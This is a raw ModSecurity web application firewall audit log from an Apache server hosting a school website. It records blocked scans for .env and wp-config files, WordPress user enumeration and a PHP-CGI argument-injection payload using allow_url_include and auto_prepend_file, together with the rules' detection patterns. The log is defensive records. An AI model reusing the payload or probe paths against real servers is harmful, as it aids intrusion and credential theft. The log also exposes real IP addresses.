108.167.189.34 X-Forwarded-Proto: http Connection: close Accept: */* --6564da54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6564da54-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745386035804852 1205 (- - -) Stopwatch2: 1745386035804852 1205; combined=372, p1=328, p2=0, p3=0, p4=0, p5=44, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6564da54-Z-- --cf314c51-A-- [23/Apr/2025:13:03:17 +0700] aAiCpRuwXEWV6ydgl50WFQAAABI 103.236.140.4 45206 103.236.140.4 8181 --cf314c51-B-- GET /wp-config.backup HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 89.46.105.243 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 89.46.105.243 X-Forwarded-Proto: http Connection: close Accept: */* --cf314c51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cf314c51-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745388197048577 3487 (- - -) Stopwatch2: 1745388197048577 3487; combined=1534, p1=675, p2=824, p3=0, p4=0, p5=34, sr=143, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cf314c51-Z-- --c606dc30-A-- [23/Apr/2025:14:56:24 +0700] aAidKD1ahuoJLEjKiAXSbwAAAIk 103.236.140.4 45174 103.236.140.4 8181 --c606dc30-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 109.70.100.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.70.100.6 X-Forwarded-Proto: https Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) --c606dc30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c606dc30-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745394984147430 2125 (- - -) Stopwatch2: 1745394984147430 2125; combined=979, p1=328, p2=596, p3=0, p4=0, p5=54, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c606dc30-Z-- --10724e09-A-- [23/Apr/2025:15:21:06 +0700] aAii8tIw_rqnm4P5_adj9AAAAE8 103.236.140.4 51324 103.236.140.4 8181 --10724e09-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.227.231.159 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.227.231.159 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --10724e09-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10724e09-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745396466493198 690 (- - -) Stopwatch2: 1745396466493198 690; combined=304, p1=272, p2=0, p3=0, p4=0, p5=32, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10724e09-Z-- --eb3bc210-A-- [23/Apr/2025:15:33:16 +0700] aAilzD1ahuoJLEjKiAXVPQAAAI0 103.236.140.4 54400 103.236.140.4 8181 --eb3bc210-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.91.125.252 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.91.125.252 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --eb3bc210-C-- 7Íexamplecom --eb3bc210-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --eb3bc210-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1745397196644341 3106 (- - -) Stopwatch2: 1745397196644341 3106; combined=1912, p1=490, p2=1346, p3=17, p4=20, p5=39, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eb3bc210-Z-- --68cc7934-A-- [23/Apr/2025:15:33:16 +0700] aAilzDI97BrbgvDq16T94wAAAM0 103.236.140.4 54406 103.236.140.4 8181 --68cc7934-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.91.125.252 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.91.125.252 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --68cc7934-C-- iexamplecom --68cc7934-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --68cc7934-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1745397196936999 3084 (- - -) Stopwatch2: 1745397196936999 3084; combined=2077, p1=451, p2=1559, p3=19, p4=23, p5=25, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68cc7934-Z-- --1fc92733-A-- [23/Apr/2025:15:33:17 +0700] aAilzTI97BrbgvDq16T95AAAAM4 103.236.140.4 54416 103.236.140.4 8181 --1fc92733-B-- POST /query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.91.125.252 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.91.125.252 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --1fc92733-C-- š$examplecom --1fc92733-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --1fc92733-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1745397197235753 3445 (- - -) Stopwatch2: 1745397197235753 3445; combined=2232, p1=443, p2=1711, p3=24, p4=27, p5=27, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1fc92733-Z-- --5247817c-A-- [23/Apr/2025:15:33:17 +0700] aAilzT1ahuoJLEjKiAXVQAAAAI4 103.236.140.4 54422 103.236.140.4 8181 --5247817c-B-- POST /query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.91.125.252 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.91.125.252 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --5247817c-C-- 0examplecom --5247817c-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --5247817c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1745397197529577 3242 (- - -) Stopwatch2: 1745397197529577 3242; combined=2123, p1=505, p2=1551, p3=19, p4=23, p5=25, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5247817c-Z-- --d9b1db24-A-- [23/Apr/2025:15:33:17 +0700] aAilzT1ahuoJLEjKiAXVQQAAAJM 103.236.140.4 54428 103.236.140.4 8181 --d9b1db24-B-- POST /resolve HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.91.125.252 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.91.125.252 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --d9b1db24-C-- }Kexamplecom --d9b1db24-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9b1db24-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1745397197821265 2576 (- - -) Stopwatch2: 1745397197821265 2576; combined=1713, p1=326, p2=1334, p3=16, p4=18, p5=19, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9b1db24-Z-- --d3772b7b-A-- [23/Apr/2025:15:33:18 +0700] aAilzj1ahuoJLEjKiAXVQgAAAJE 103.236.140.4 54434 103.236.140.4 8181 --d3772b7b-B-- POST /resolve HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.91.125.252 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.91.125.252 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --d3772b7b-C-- Texamplecom --d3772b7b-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3772b7b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1745397198121279 3087 (- - -) Stopwatch2: 1745397198121279 3087; combined=1972, p1=418, p2=1486, p3=20, p4=23, p5=24, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3772b7b-Z-- --0a8dad21-A-- [23/Apr/2025:15:33:18 +0700] aAilzjI97BrbgvDq16T96gAAANM 103.236.140.4 54444 103.236.140.4 8181 --0a8dad21-B-- POST / HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.91.125.252 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.91.125.252 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --0a8dad21-C-- Š>examplecom --0a8dad21-F-- HTTP/1.1 200 OK Last-Modified: Sat, 19 Aug 2023 08:21:22 GMT ETag: "13cd-6034254946480" Accept-Ranges: bytes Content-Length: 5069 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html --0a8dad21-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1745397198415207 2616 (- - -) Stopwatch2: 1745397198415207 2616; combined=1685, p1=385, p2=1232, p3=25, p4=19, p5=24, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0a8dad21-Z-- --7ae94753-A-- [23/Apr/2025:15:33:19 +0700] aAilzzI97BrbgvDq16T97QAAAMI 103.236.140.4 54450 103.236.140.4 8181 --7ae94753-B-- POST / HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.91.125.252 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.91.125.252 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --7ae94753-C-- ÿuexamplecom --7ae94753-F-- HTTP/1.1 200 OK Last-Modified: Sat, 19 Aug 2023 08:21:22 GMT ETag: "13cd-6034254946480" Accept-Ranges: bytes Content-Length: 5069 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html --7ae94753-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1745397199097477 3393 (- - -) Stopwatch2: 1745397199097477 3393; combined=2052, p1=476, p2=1490, p3=26, p4=23, p5=37, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ae94753-Z-- --8744203e-A-- [23/Apr/2025:15:45:26 +0700] aAioptIw_rqnm4P5_adlKAAAAEc 103.236.140.4 57448 103.236.140.4 8181 --8744203e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://smkn22-jkt.sch.id Host: smkn22-jkt.sch.id X-Real-IP: 154.86.114.147 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.86.114.147 X-Forwarded-Proto: https Connection: close Origin: https://smkn22-jkt.sch.id User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --8744203e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8744203e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745397926300602 3091 (- - -) Stopwatch2: 1745397926300602 3091; combined=1302, p1=436, p2=836, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8744203e-Z-- --a66bdd4f-A-- [23/Apr/2025:18:09:15 +0700] aAjKWz1ahuoJLEjKiAXeBgAAAJg 103.236.140.4 38062 103.236.140.4 8181 --a66bdd4f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.86 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.86 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3879.0 Safari/537.36 Edg/78.0.249.1 Accept-Charset: utf-8 --a66bdd4f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a66bdd4f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745406555347838 849 (- - -) Stopwatch2: 1745406555347838 849; combined=391, p1=350, p2=0, p3=0, p4=0, p5=41, sr=139, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a66bdd4f-Z-- --b8ccf265-A-- [23/Apr/2025:19:23:05 +0700] aAjbqRuwXEWV6ydgl51A-AAAAAQ 103.236.140.4 52536 103.236.140.4 8181 --b8ccf265-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 36.137.113.226 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 36.137.113.226 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --b8ccf265-C-- --b8ccf265-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8ccf265-E-- --b8ccf265-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745410985782112 4577 (- - -) Stopwatch2: 1745410985782112 4577; combined=3161, p1=478, p2=2645, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8ccf265-Z-- --bb623109-A-- [23/Apr/2025:19:29:45 +0700] aAjdORuwXEWV6ydgl51HwAAAAA4 103.236.140.4 49500 103.236.140.4 8181 --bb623109-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.108 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.108 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --bb623109-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb623109-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745411385449652 1175 (- - -) Stopwatch2: 1745411385449652 1175; combined=696, p1=334, p2=0, p3=0, p4=0, p5=362, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb623109-Z-- --210b875b-A-- [23/Apr/2025:19:29:45 +0700] aAjdOT1ahuoJLEjKiAXzWwAAAJY 103.236.140.4 49510 103.236.140.4 8181 --210b875b-B-- GET /config/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.108 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.108 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --210b875b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --210b875b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745411385619885 841 (- - -) Stopwatch2: 1745411385619885 841; combined=348, p1=292, p2=0, p3=0, p4=0, p5=55, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --210b875b-Z-- --881c734a-A-- [23/Apr/2025:19:29:45 +0700] aAjdOT1ahuoJLEjKiAXzXgAAAIU 103.236.140.4 49524 103.236.140.4 8181 --881c734a-B-- GET /.env.production HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.108 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.108 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --881c734a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --881c734a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745411385821086 854 (- - -) Stopwatch2: 1745411385821086 854; combined=397, p1=358, p2=0, p3=0, p4=0, p5=39, sr=139, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --881c734a-Z-- --cde7061b-A-- [23/Apr/2025:19:29:45 +0700] aAjdORuwXEWV6ydgl51HwQAAABA 103.236.140.4 49538 103.236.140.4 8181 --cde7061b-B-- GET /api/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.108 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.108 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --cde7061b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cde7061b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745411385990611 947 (- - -) Stopwatch2: 1745411385990611 947; combined=446, p1=346, p2=0, p3=0, p4=0, p5=100, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
